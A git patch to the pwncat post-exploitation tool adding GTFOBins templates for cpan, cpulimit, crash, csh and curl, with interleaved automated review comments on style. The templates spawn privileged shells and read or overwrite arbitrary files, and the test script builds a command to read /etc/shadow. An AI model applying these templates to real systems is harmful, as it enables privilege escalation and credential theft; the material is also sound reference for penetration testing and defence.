From bc774eb7e005afb2008c4e351d576a1e186d84fb Mon Sep 17 00:00:00 2001
From: John Hammond
Date: Thu, 14 May 2020 22:20:38 -0400
Subject: [PATCH] Added new GTFOBins for curl and csh

---
 data/gtfobins.json | 134 +++++++++++++++++++++++++++++++++++++++++----
 data/pwncat.pub    |   2 +-
 gtfobinstest.py    |  10 ++--
 3 files changed, 131 insertions(+), 15 deletions(-)

diff --git a/data/gtfobins.json b/data/gtfobins.json
index a6e047d..b36eb5e 100644
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@@ -86,7 +86,7 @@
         },
         {
             "type": "read",
-            "stream": "print",
+            "stream": "raw",
             "payload": "{command}",
             "args": ["-c", "'{cat} {lfile}'"],
             "suid": ["-p"]
@@ -364,15 +364,129 @@
             "exit": "exit\n"
         }
 
-        // Could we do some file_read and file_write with this too..?
+        // Could we do some file_read and file_write with this too..? We can run cobol...
     ],
 //-------------------------------------------------------------------
-    // "cpan": [
-    //     {
-    //         "type": "shell",
-    //         "payload": "{command}",
-    //         "input" : "! exec {shell} -p\n",
-    //         "exit": "exit\n"
-    //     }
-    // ]
+    "cpan": [
+        {
+            "type": "shell",
+            "payload": "{command}",
+            "input" : "! system(\"{shell} -p\")\n",
+            // exit the shell, AND exit cpan
+            "exit": "exit\nexit\n"
+        }
+
+        // Could we do some file_read and file_write with this too? We can run perl...
+    ],
+//-------------------------------------------------------------------
+    "cpulimit": [
+        {
+            "type": "shell",
+            "payload": "{command}",
+            "args": ["-l", "100", "-f", "\"{shell}\""],
+            // exit the shell, AND exit cpan
+            "exit": "exit\n"
+        }
+        // We cannot seem to pass other arguments to process ran, so no read/write (???)
+    ],
+//-------------------------------------------------------------------
+    "crash": [
+        {
+            "type": "shell",
+            "payload": "{command}",
+            "args": ["-h"],
+            "input": "!{shell} -p\n",
+            // exit the shell, AND exit cpan
+            "exit": "exit\nq\n"
+        }
+        // We cannot seem to pass other arguments to process ran, so no read/write (???)
+    ],
+//-------------------------------------------------------------------
+    "csh": [
+        {
+            "type": "shell",
+            "payload": "{command}",
+            "suid": ["-b"],
+            "input": "{shell} -p\n",
+            // exit the shell, AND exit csh
+            "exit": "exit\nexit\n"
+        },
+        {
+            "type": "read",
+            "stream": "print",
+            "payload": "{command}",
+            // "suid" is not supplied because it must be very last argument
+            "args": ["-c", "\"{cat} {lfile}\"", "-b"]
+        }
+        // Using write, it doesn't get the entire text to clobber /etc/passwd
+        // {
+        //     "type": "write",
+        //     "stream": "base64",
+        //     "payload": "{command}",
+        //     "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
+        //     // "suid" is not supplied because it must be very last argument
+        //     "exit": "{ctrl_d}"
+        // }
+    ],
+    "bsd-csh": [
+        {
+            "type": "shell",
+            "payload": "{command}",
+            "input": "{shell} -p\n",
+            "suid": ["-b"],
+            // exit the shell, AND exit csh
+            "exit": "exit\nexit\n"
+        },
+        {
+            "type": "read",
+            "stream": "print",
+            "payload": "{command}",
+            // "suid" is not supplied because it must be very last argument
+            "args": ["-c", "\"{cat} {lfile}\"", "-b"]
+        }
+        // Using write, it doesn't get the entire text to clobber /etc/passwd
+        // {
+        //     "type": "write",
+        //     "stream": "base64",
+        //     "payload": "{command}",
+        //     "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
+        //     // "suid" is not supplied because it must be very last argument
+        //     "exit": "{ctrl_d}"
+        // }
+    ],
+//-------------------------------------------------------------------
+    "curl": [
+        {
+            "type": "read",
+            "stream": "raw",
+            "payload": "{command}",
+            "args": ["-s", "file://{lfile} --output -"]
+        },
+        {
+            "type": "read",
+            "stream": "base64",
+            "payload": "{command}",
+            "args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
+        },
+        {
+            "type": "write",
+            "stream": "print",
+            // This is weird because under the case where we are running w/ sudo,
+            // we need to ask for the password first. The first "{command}" will
+            // ask for the sudo password, then fail. The second "{command}"
+            // will not ask for the sudo password, and then the copy will succeed.
+            // Without sudo, the first command will simply fail, and the second
+            // will succeed. This is the same for the other payload below.
+            "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
+            "args": ["-s", "file://$TF --output {lfile}"],
+            "exit": "{ctrl_d}"
+        },
+        {
+            "type": "write",
+            "stream": "base64",
+            "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
+            "args": ["-s", "file://$TF --output {lfile}"],
+            "exit": "{ctrl_d}"
+        }
+    ]
 }
\ No newline at end of file
diff --git a/data/pwncat.pub b/data/pwncat.pub
index 0a23efe..9479174 100644
--- a/data/pwncat.pub
+++ b/data/pwncat.pub
@@ -1 +1 @@
-ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= caleb@stewie-xps
+ssh-rsa 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 pwncat@pwncat
diff --git a/gtfobinstest.py b/gtfobinstest.py
index e2d8cfc..24f1441 100644
--- a/gtfobinstest.py
+++ b/gtfobinstest.py
@@ -17,8 +17,10 @@ def which(path: str, quote=False):
 gtfo = GTFOBins("data/gtfobins.json", which) -binary_to_test = "cpan" -capabilities_to_test = Capability.SHELL +binary_to_test = "curl" +# capabilities_to_test = Capability.SHELL +capabilities_to_test = Capability.WRITE +# capabilities_to_test = Capability.WRITE our_shell = "/bin/bash" binary = gtfo.find_binary(binary_to_test)
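Review bot: The comment `// exit the shell, AND exit cpan` above the `"exit"` key of the new `cpulimit` and `crash` entries is copy-pasted from the `cpan` entry and no longer describes the strings actually sent (`exit\n` and `exit\nq\n`); I would reword them to match, e.g. `// exit the spawned shell` for cpulimit and `// exit the shell, then "q" to quit crash` for crash. The `bsd-csh` array is a verbatim copy of `csh` (only the order of `"input"` and `"suid"` differs), so a one-line comment such as `// identical to "csh" above; keep the two in sync` on the `bsd-csh` key would tell a maintainer the duplication is deliberate. Two smaller style points: `"input" :` in the cpan entry has a space before the colon unlike every other key in the hunk, and the file still ends without a trailing newline.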
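Review bot: The added line `# capabilities_to_test = Capability.WRITE` directly below the live `capabilities_to_test = Capability.WRITE` is an exact duplicate of it and reads as a leftover from toggling; it should be dropped, or changed to whichever alternative it was meant to preserve. More generally, choosing the binary and capability by editing constants and commenting lines in and out means the committed script exercises only one combination at a time; reading them from the command line, e.g. `binary_to_test = sys.argv[1] if len(sys.argv) > 1 else "curl"` (with `import sys` at the top if the file does not already have it), keeps every variant runnable without editing the file.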
@@ -30,8 +32,8 @@ methods = binary.iter_methods(
 )
 for method in methods:
     # print(method)
-    print(method.build(shell=our_shell)[0])
-    # print(method.build(lfile="/etc/shadow")[0])
+    # print(method.build(shell=our_shell, suid=True))
+    print(method.build(lfile="/etc/shadow", suid=True)[0])
     # print(method.build(lfile="/tmp/test", data="hello")[0])
 
 # all_binaries = list(gtfo.iter_methods(Capability.SHELL))
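Review bot: The loop body still only prints the built command and never checks it, so this remains a manual smoke script rather than a test; the newly enabled `print(method.build(lfile="/etc/shadow", suid=True)[0])` would be more useful bound to a name and followed by a check that every template placeholder was substituted, e.g. `built = method.build(lfile="/etc/shadow", suid=True)[0]` / `assert "{" not in built, built` / `print(built)` (presuming `[0]` is the rendered command string, as the surrounding calls suggest). If a legitimate payload can contain a literal brace, tighten the check to the known placeholder names instead. The `methods = binary.iter_methods(` call that the hunk's leading `)` closes starts outside the hunk.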